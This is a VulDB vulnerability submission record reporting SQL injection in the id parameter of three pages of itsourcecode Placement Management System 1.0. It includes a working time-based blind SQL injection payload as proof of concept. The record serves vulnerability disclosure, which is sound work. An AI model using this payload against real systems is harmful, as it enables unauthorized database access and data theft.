Submit #383865: itsourcecode Placement Management System 1.0 SQLiinfo

Titelitsourcecode Placement Management System 1.0 SQLi
BeschreibungIn the view_company.php, view_drive.php, and view_student.php pages, an id parameter can be passed to query data. However, due to inadequate filtering of the id parameter on these pages, SQL injection vulnerabilities are present. ——————————POC——————————— Parameter: id (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 5490 FROM (SELECT(SLEEP(5)))qDPR) AND 'HyHB'='HyHB
Quelle⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE11-4.md
Benutzer
 Dee.Mirage (UID 71702)
Einreichung31.07.2024 16:22 (vor 2 Jahren)
Moderieren03.08.2024 08:49 (3 days later)
StatusAkzeptiert
VulDB Eintrag273543 [itsourcecode Placement Management System 1.0 view_company.php ID SQL Injection]
Punkte20

ZurückÜbersichtWeiter

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!